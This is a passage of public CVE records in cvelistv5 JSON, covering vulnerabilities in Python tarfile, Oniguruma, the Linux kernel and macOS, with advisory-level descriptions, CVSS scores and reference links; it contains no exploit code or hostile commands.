"version": "n/a" } ] } ], "datePublic": "2007-08-24T00:00:00", "descriptions": [ { "lang": "en", "value": "Directory traversal vulnerability in the (1) extract and (2) extractall functions in the tarfile module in Python allows user-assisted remote attackers to overwrite arbitrary files via a .. (dot dot) sequence in filenames in a TAR archive, a related issue to CVE-2001-1267." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-23T02:06:38.035237", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "26623", "tags": [ "third-party-advisory" ], "url": "http://secunia.com/advisories/26623" }, { "name": "ADV-2007-3022", "tags": [ "vdb-entry" ], "url": "http://www.vupen.com/english/advisories/2007/3022" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=263261" }, { "name": "[python-dev] 20070824 tarfile and directory traversal vulnerability", "tags": [ "mailing-list" ], "url": "http://mail.python.org/pipermail/python-dev/2007-August/074290.html" }, { "name": "[python-dev] 20070825 tarfile and directory traversal vulnerability", "tags": [ "mailing-list" ], "url": "http://mail.python.org/pipermail/python-dev/2007-August/074292.html" }, { "name": "GLSA-202309-06", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202309-06" }, { "name": "FEDORA-2024-d1f1084584", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FI55PGL47ES3OU2FQPGEHOI2EK3S2OBH/" }, { "name": "FEDORA-2024-ebb3c95344", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CVBB7NU3YIRRDOKLYVN647WPRR3IAKR6/" }, { "name": "FEDORA-2024-46374d2703", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KA4Z44ZAI4SY7THCFBUDNT5EEFO4XQ3A/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2007-4559", "datePublished": "2007-08-28T00:00:00", "dateReserved": "2007-08-27T00:00:00", "dateUpdated": "2024-08-07T15:01:09.683Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-19204
Vulnerability from cvelistv5
Published
2019-11-21 20:06
Modified
2024-08-05 02:09
Severity ?
EPSS score ?
Summary
An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function fetch_interval_quantifier (formerly known as fetch_range_quantifier) in regparse.c, PFETCH is called without checking PEND. This leads to a heap-based buffer over-read.
References
▼ | URL | Tags |
---|---|---|
https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2 | x_refsource_MISC | |
https://github.com/kkos/oniguruma/issues/162 | x_refsource_MISC | |
https://github.com/ManhNDd/CVE-2019-19204 | x_refsource_MISC | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NO267PLHGYZSWX3XTRPKYBKD4J3YOU5V/ | vendor-advisory, x_refsource_FEDORA | |
https://lists.debian.org/debian-lts-announce/2019/12/msg00002.html | mailing-list, x_refsource_MLIST | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V3MBNW6Z4DOXSCNWGBLQ7OA3OGUJ44WL/ | vendor-advisory, x_refsource_FEDORA | |
https://github.com/tarantula-team/CVE-2019-19204 | x_refsource_MISC | |
https://usn.ubuntu.com/4460-1/ | vendor-advisory, x_refsource_UBUNTU |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T02:09:39.457Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/kkos/oniguruma/issues/162" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/ManhNDd/CVE-2019-19204" }, { "name": "FEDORA-2019-d942abd0d4", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NO267PLHGYZSWX3XTRPKYBKD4J3YOU5V/" }, { "name": "[debian-lts-announce] 20191204 [SECURITY] [DLA 2020-1] libonig security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00002.html" }, { "name": "FEDORA-2019-73197ff9a0", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V3MBNW6Z4DOXSCNWGBLQ7OA3OGUJ44WL/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/tarantula-team/CVE-2019-19204" }, { "name": "USN-4460-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "https://usn.ubuntu.com/4460-1/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function fetch_interval_quantifier (formerly known as fetch_range_quantifier) in regparse.c, PFETCH is called without checking PEND. This leads to a heap-based buffer over-read." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-08-24T13:06:04", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/kkos/oniguruma/issues/162" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/ManhNDd/CVE-2019-19204" }, { "name": "FEDORA-2019-d942abd0d4", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NO267PLHGYZSWX3XTRPKYBKD4J3YOU5V/" }, { "name": "[debian-lts-announce] 20191204 [SECURITY] [DLA 2020-1] libonig security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00002.html" }, { "name": "FEDORA-2019-73197ff9a0", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V3MBNW6Z4DOXSCNWGBLQ7OA3OGUJ44WL/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/tarantula-team/CVE-2019-19204" }, { "name": "USN-4460-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "https://usn.ubuntu.com/4460-1/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2019-19204", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function fetch_interval_quantifier (formerly known as fetch_range_quantifier) in regparse.c, PFETCH is called without checking PEND. This leads to a heap-based buffer over-read." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2", "refsource": "MISC", "url": "https://github.com/kkos/oniguruma/releases/tag/v6.9.4_rc2" }, { "name": "https://github.com/kkos/oniguruma/issues/162", "refsource": "MISC", "url": "https://github.com/kkos/oniguruma/issues/162" }, { "name": "https://github.com/ManhNDd/CVE-2019-19204", "refsource": "MISC", "url": "https://github.com/ManhNDd/CVE-2019-19204" }, { "name": "FEDORA-2019-d942abd0d4", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NO267PLHGYZSWX3XTRPKYBKD4J3YOU5V/" }, { "name": "[debian-lts-announce] 20191204 [SECURITY] [DLA 2020-1] libonig security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00002.html" }, { "name": "FEDORA-2019-73197ff9a0", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V3MBNW6Z4DOXSCNWGBLQ7OA3OGUJ44WL/" }, { "name": "https://github.com/tarantula-team/CVE-2019-19204", "refsource": "MISC", "url": "https://github.com/tarantula-team/CVE-2019-19204" }, { "name": "USN-4460-1", "refsource": "UBUNTU", "url": "https://usn.ubuntu.com/4460-1/" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2019-19204", "datePublished": "2019-11-21T20:06:47", "dateReserved": "2019-11-21T00:00:00", "dateUpdated": "2024-08-05T02:09:39.457Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-51043
Vulnerability from cvelistv5
Published
2024-01-23 00:00
Modified
2024-08-29 14:28
Severity ?
EPSS score ?
Summary
In the Linux kernel before 6.4.5, drivers/gpu/drm/drm_atomic.c has a use-after-free during a race condition between a nonblocking atomic commit and a driver unload.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T22:23:44.220Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/4e076c73e4f6e90816b30fcd4a0d7ab365087255" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.4.5" } ], "title": "CVE Program Container" }, { "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-51043", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-08-29T13:47:31.310537Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-08-29T14:28:09.022Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel before 6.4.5, drivers/gpu/drm/drm_atomic.c has a use-after-free during a race condition between a nonblocking atomic commit and a driver unload." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-23T10:10:40.556809", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/4e076c73e4f6e90816b30fcd4a0d7ab365087255" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.4.5" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-51043", "datePublished": "2024-01-23T00:00:00", "dateReserved": "2023-12-18T00:00:00", "dateUpdated": "2024-08-29T14:28:09.022Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6932
Vulnerability from cvelistv5
Published
2023-12-19 14:09
Modified
2024-08-02 08:42
Severity ?
EPSS score ?
Summary
Use-after-free in Linux kernel's ipv4: igmp component
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:42:08.680Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=e2b706c691905fe78468c361aaabc719d0a496f1" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/e2b706c691905fe78468c361aaabc719d0a496f1" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.7", "status": "affected", "version": "2.6.12", "versionType": "custom" } ] } ], "datePublic": "2023-11-24T15:25:56+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability in the Linux kernel\u0027s ipv4: igmp component can be exploited to achieve local privilege escalation.\n\nA race condition can be exploited to cause a timer be mistakenly registered on a RCU read locked object which is freed by another thread.\n\nWe recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-19T14:09:15.662Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=e2b706c691905fe78468c361aaabc719d0a496f1" }, { "url": "https://kernel.dance/e2b706c691905fe78468c361aaabc719d0a496f1" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" }, { "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in Linux kernel\u0027s ipv4: igmp component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-6932", "datePublished": "2023-12-19T14:09:15.662Z", "dateReserved": "2023-12-18T20:14:26.281Z", "dateUpdated": "2024-08-02T08:42:08.680Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-16163
Vulnerability from cvelistv5
Published
2019-09-09 15:38
Modified
2024-08-05 01:10
Severity ?
EPSS score ?
Summary
Oniguruma before 6.9.3 allows Stack Exhaustion in regcomp.c because of recursion in regparse.c.
References
▼ | URL | Tags |
---|---|---|
https://github.com/kkos/oniguruma/issues/147 | x_refsource_MISC | |
https://github.com/kkos/oniguruma/commit/4097828d7cc87589864fecf452f2cd46c5f37180 | x_refsource_MISC | |
https://github.com/kkos/oniguruma/compare/v6.9.2...v6.9.3 | x_refsource_MISC | |
https://lists.debian.org/debian-lts-announce/2019/09/msg00010.html | mailing-list, x_refsource_MLIST | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NWOWZZNFSAWM3BUTQNAE3PD44A6JU4KE/ | vendor-advisory, x_refsource_FEDORA | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZW47MSFZ6WYOAOFXHBDGU4LYACFRKC2Y/ | vendor-advisory, x_refsource_FEDORA | |
https://usn.ubuntu.com/4460-1/ | vendor-advisory, x_refsource_UBUNTU |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T01:10:41.294Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/kkos/oniguruma/issues/147" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/kkos/oniguruma/commit/4097828d7cc87589864fecf452f2cd46c5f37180" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/kkos/oniguruma/compare/v6.9.2...v6.9.3" }, { "name": "[debian-lts-announce] 20190912 [SECURITY] [DLA 1918-1] libonig security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00010.html" }, { "name": "FEDORA-2019-e4819c6510", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NWOWZZNFSAWM3BUTQNAE3PD44A6JU4KE/" }, { "name": "FEDORA-2019-6a931c8eec", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZW47MSFZ6WYOAOFXHBDGU4LYACFRKC2Y/" }, { "name": "USN-4460-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "https://usn.ubuntu.com/4460-1/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Oniguruma before 6.9.3 allows Stack Exhaustion in regcomp.c because of recursion in regparse.c." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-08-24T13:06:05", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/kkos/oniguruma/issues/147" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/kkos/oniguruma/commit/4097828d7cc87589864fecf452f2cd46c5f37180" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/kkos/oniguruma/compare/v6.9.2...v6.9.3" }, { "name": "[debian-lts-announce] 20190912 [SECURITY] [DLA 1918-1] libonig security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00010.html" }, { "name": "FEDORA-2019-e4819c6510", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NWOWZZNFSAWM3BUTQNAE3PD44A6JU4KE/" }, { "name": "FEDORA-2019-6a931c8eec", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZW47MSFZ6WYOAOFXHBDGU4LYACFRKC2Y/" }, { "name": "USN-4460-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "https://usn.ubuntu.com/4460-1/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2019-16163", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Oniguruma before 6.9.3 allows Stack Exhaustion in regcomp.c because of recursion in regparse.c." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/kkos/oniguruma/issues/147", "refsource": "MISC", "url": "https://github.com/kkos/oniguruma/issues/147" }, { "name": "https://github.com/kkos/oniguruma/commit/4097828d7cc87589864fecf452f2cd46c5f37180", "refsource": "MISC", "url": "https://github.com/kkos/oniguruma/commit/4097828d7cc87589864fecf452f2cd46c5f37180" }, { "name": "https://github.com/kkos/oniguruma/compare/v6.9.2...v6.9.3", "refsource": "MISC", "url": "https://github.com/kkos/oniguruma/compare/v6.9.2...v6.9.3" }, { "name": "[debian-lts-announce] 20190912 [SECURITY] [DLA 1918-1] libonig security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00010.html" }, { "name": "FEDORA-2019-e4819c6510", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NWOWZZNFSAWM3BUTQNAE3PD44A6JU4KE/" }, { "name": "FEDORA-2019-6a931c8eec", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZW47MSFZ6WYOAOFXHBDGU4LYACFRKC2Y/" }, { "name": "USN-4460-1", "refsource": "UBUNTU", "url": "https://usn.ubuntu.com/4460-1/" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2019-16163", "datePublished": "2019-09-09T15:38:09", "dateReserved": "2019-09-09T00:00:00", "dateUpdated": "2024-08-05T01:10:41.294Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1989
Vulnerability from cvelistv5
Published
2023-04-11 00:00
Modified
2024-08-26 13:09
Severity ?
EPSS score ?
Summary
A use-after-free flaw was found in btsdio_remove in drivers\bluetooth\btsdio.c in the Linux Kernel. In this flaw, a call to btsdio_remove with an unfinished job, may cause a race problem leading to a UAF on hdev devices.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:05:27.122Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=f132c2d13088" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230601-0004/" }, { "name": "DSA-5492", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5492" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" }, { "affected": [ { "cpes": [ "cpe:2.3:a:netapp:hci_baseboard_management_controller:h300s:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_baseboard_management_controller:h410c:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_baseboard_management_controller:h410s:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_baseboard_management_controller:h500s:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_baseboard_management_controller:h700s:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "hci_baseboard_management_controller", "vendor": "netapp", "versions": [ { "status": "affected", "version": "h300s" }, { "status": "affected", "version": "h410c" }, { "status": "affected", "version": "h410s" }, { "status": "affected", "version": "h500s" }, { "status": "affected", "version": "h700s" } ] }, { "cpes": [ "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "linux_kernel", "vendor": "linux", "versions": [ { "lessThan": "6.3+rc4", "status": "affected", "version": "0", "versionType": "custom" } ] }, { "cpes": [ "cpe:2.3:o:debian:debian_linux:-:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "debian_linux", "vendor": "debian", "versions": [ { "status": "affected", "version": "5.10.178-3" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-1989", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-05-10T04:00:19.103887Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-26T13:09:35.058Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel version prior to Kernel 6.3 RC4" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in btsdio_remove in drivers\\bluetooth\\btsdio.c in the Linux Kernel. In this flaw, a call to btsdio_remove with an unfinished job, may cause a race problem leading to a UAF on hdev devices." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T19:06:36.230942", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=f132c2d13088" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230601-0004/" }, { "name": "DSA-5492", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5492" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1989", "datePublished": "2023-04-11T00:00:00", "dateReserved": "2023-04-11T00:00:00", "dateUpdated": "2024-08-26T13:09:35.058Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-10001
Vulnerability from cvelistv5
Published
2021-04-02 17:24
Modified
2024-08-04 10:50
Severity ?
EPSS score ?
Summary
An input validation issue was addressed with improved memory handling. This issue is fixed in macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave. A malicious application may be able to read restricted memory.
References
▼ | URL | Tags |
---|---|---|
https://support.apple.com/en-us/HT212011 | x_refsource_MISC | |
https://lists.debian.org/debian-lts-announce/2021/10/msg00027.html | mailing-list, x_refsource_MLIST |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T10:50:57.819Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://support.apple.com/en-us/HT212011" }, { "name": "[debian-lts-announce] 20211030 [SECURITY] [DLA 2800-1] cups security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00027.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "macOS", "vendor": "Apple", "versions": [ { "lessThan": "11.1", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "An input validation issue was addressed with improved memory handling. This issue is fixed in macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave. A malicious application may be able to read restricted memory." } ], "problemTypes": [ { "descriptions": [ { "description": "A 